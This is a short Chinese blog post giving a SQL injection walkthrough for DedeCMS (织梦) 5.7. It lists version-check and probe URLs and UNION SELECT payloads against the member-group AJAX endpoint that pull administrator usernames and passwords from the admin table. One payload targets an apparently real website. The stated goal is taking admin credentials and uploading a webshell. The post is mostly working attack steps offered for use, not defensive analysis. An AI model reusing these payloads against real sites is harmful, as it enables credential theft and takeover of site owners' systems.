织梦5.7注入漏洞

  • A+

思路:访问/data/admin/ver.txt来查看cms

织梦5.7注入漏洞

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传马子

过程:

查看网站的版本

code 区域

cms /data/admin/ver.txt

查看是否有"朋友 修改",有则存在注入

code 区域

/member/ajax_membergroup.php?action=post&membergroup=1

帐号

code 区域

http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `#@__admin` where 1 or id=@`'`

去掉前三位和最后一位,得到管理员密码

code 区域

/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `#@__admin`

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin
avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: